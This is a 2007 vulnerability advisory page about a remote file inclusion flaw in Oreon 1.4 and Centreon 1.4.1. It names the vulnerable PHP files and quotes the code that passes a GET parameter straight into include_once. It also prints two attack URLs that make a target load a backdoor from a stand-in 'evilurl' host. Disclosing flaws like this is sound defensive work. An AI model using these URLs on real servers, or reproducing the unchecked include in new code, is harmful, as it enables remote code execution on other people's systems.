SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Oreon/Centreon - Multiple Remote File Inclusion


Arrow  SecurityAlert : 3472
Arrow  CVE : CVE-2007-6485
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : Michael Brooks
Arrow  Published : 21.12.2007

Arrow  Affected Software : 1.4(Oreon) and 1.4.1(Centreon)



Arrow  Advisory Text :  

By Michael Brooks

Vulnerability Type: Multiple Remote File Inclusion.

Software: Oreon and Centreon

Homepage:http://www.oreon-project.org/ or http://www.centreon.com/

Versions: 1.4(Oreon) and 1.4.1(Centreon)

The vulnerable file is:

./oreon-1.4/www/include/monitoring/engine/MakeXML.php

Another,virtually identical RFI:

./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php

The attack:

http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=htt
p://evilurl/backdoor.txt?

or

http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fil
eOreonConf=http://evilurl/backdoor.txt?

file MakeXML.php line 42 & 43:

include_once($oreonPath . "www/oreon.conf.php");

include_once($oreonPath . "www/include/common/common-Func-ACL.php");

Register_globals isn't needed for the taint:

file MakeXML.php line 28:

if (isset($_GET["fileOreonConf"]))

$oreonPath = $_GET["fileOreonConf"];

However magic_quotes_gpc is require for LFI because you need a null byte.

Peace





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.